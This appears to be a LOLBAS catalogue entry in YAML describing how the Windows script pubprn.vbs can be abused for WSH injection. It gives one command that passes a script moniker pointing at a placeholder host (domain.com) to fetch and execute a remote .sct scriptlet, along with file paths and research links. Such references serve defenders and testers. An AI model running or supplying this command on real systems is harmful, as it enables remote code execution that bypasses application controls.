--- Name: Pubprn.vbs Description: Execute Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. Full Path: - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs Code Sample: - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct Detection: [] Resources: - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - https://github.com/enigma0x3/windows-operating-system-archaeology Notes: Thanks to Matt Nelson - @enigma0x3